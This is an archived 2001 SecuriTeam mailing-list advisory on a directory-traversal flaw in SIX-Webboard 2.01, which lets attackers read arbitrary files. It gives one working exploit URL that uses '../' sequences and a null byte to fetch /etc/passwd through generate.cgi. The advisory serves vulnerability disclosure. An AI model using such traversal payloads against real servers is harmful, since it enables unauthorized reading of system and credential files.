[UNIX] SIX-Web board "Show Files" Vulnerability

From: support@securiteam.com
Date: 08/15/01

• Previous message: support@securiteam.com: "[UNIX] TrollFTPD Security Vulnerability Leads to Root Compromise"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

---

From: support@securiteam.com
To: list@securiteam.com
Subject: [UNIX] SIX-Web board "Show Files" Vulnerability
Message-Id: <20010815193644.C9982138BF@mail.der-keiler.de>
Date: Wed, 15 Aug 2001 21:36:44 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  SIX-Web board "Show Files" Vulnerability
------------------------------------------------------------------------

SUMMARY

 <http://www.sixhead.com/> SIX-Webboard, is a popular web board written by
 <mailto:webmaster@sixhead.com> Pipo. A security vulnerability in the
product gives attackers access to sensitive files.

DETAILS

Vulnerable systems:
SIX-Webboard version 2.01

The SIX-Webboard does not correctly filter '..' and '/' when it processes
user input. This allows attackers to enter arbitrary values allowing
retrieving of arbitrary files from the remote sever.

Exploit:
The following URL will try to access the /etc/passwd file:
http://www.example.com/cgi-bin/webboard/generate.cgi?
content=../../../../../../../../../etc/passwd%00&board=boardsname

(NOTE: URL has been wrapped for readability)

ADDITIONAL INFORMATION

The information has been provided by <http://www.poizonb0x.org/>
PoizonB0x Crew.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

---

• Previous message: support@securiteam.com: "[UNIX] TrollFTPD Security Vulnerability Leads to Root Compromise"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

We are proud to have Web Hosting and Rack Housing from 9 Net Avenue Deutschland.
(15)